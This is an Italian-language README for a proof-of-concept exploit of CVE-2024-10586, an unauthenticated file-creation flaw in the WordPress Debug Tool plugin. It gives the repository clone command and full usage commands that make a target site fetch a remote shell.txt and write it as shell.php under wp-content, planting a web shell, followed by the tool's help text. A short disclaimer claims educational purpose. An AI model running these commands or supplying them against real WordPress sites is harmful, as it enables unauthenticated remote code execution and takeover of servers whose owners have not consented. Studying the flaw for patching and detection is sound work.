
Exploit di prova di concetto per CVE-2024-10586 che colpisce il plugin WordPress Debug Tool. Automatizza il caricamento arbitrario di file che porta all'esecuzione remota di codice tramite richieste POST non autenticate.
Descrizione
Il plugin Debug Tool per WordPress è vulnerabile alla creazione arbitraria di file a causa di una mancanza di controllo delle capacità sulla funzione dbt_pull_image() e della mancata validazione del tipo di file in tutte le versioni fino alla 2.2 inclusa.
Ciò consente a utenti non autenticati di creare file arbitrari come file .php che possono essere sfruttati per l'esecuzione di codice remoto.
CVE-2024-10586
git clone https://github.com/Nxploited/CVE-2024-10586-Poc
cd CVE-2024-10586-Poc
Esegui lo script con il seguente comando: python CVE-2024-10586.py -u -r -p
python CVE-2024-10586.py -u http://192.168.100.74/wordpress -r http://192.168.100.74/shell.txt -p /opt/lampp/htdocs/wordpress/wp-content/shell.php
python CVE-2024-10586.py -u http://192.168.100.74/wordpress -r http://192.168.100.74/shell.txt -p /opt/lampp/htdocs/wordpress/wp-content/shell.php
usage: CVE-2024-10586.py [-h] -u URL -r REMOTE [-p PATH]
Send a POST request to WordPress admin-ajax.php.
options:
-h, --help show this help message and exit
-u URL, --url URL The base URL of the WordPress site.
-r REMOTE, --remote REMOTE
The remote URL to use in the 'source' parameter.
-p PATH, --path PATH The file path to use in the 'missed' parameter. Defaults to '/opt/lampp/htdocs/wordpress/wp-content/Nxploit.php'.
Questo script è solo per scopi educativi. Usalo in modo responsabile e solo su sistemi di tua proprietà o per i quali hai esplicita autorizzazione al test. Gli autori non sono responsabili per qualsiasi uso improprio o danno causato da questo strumento.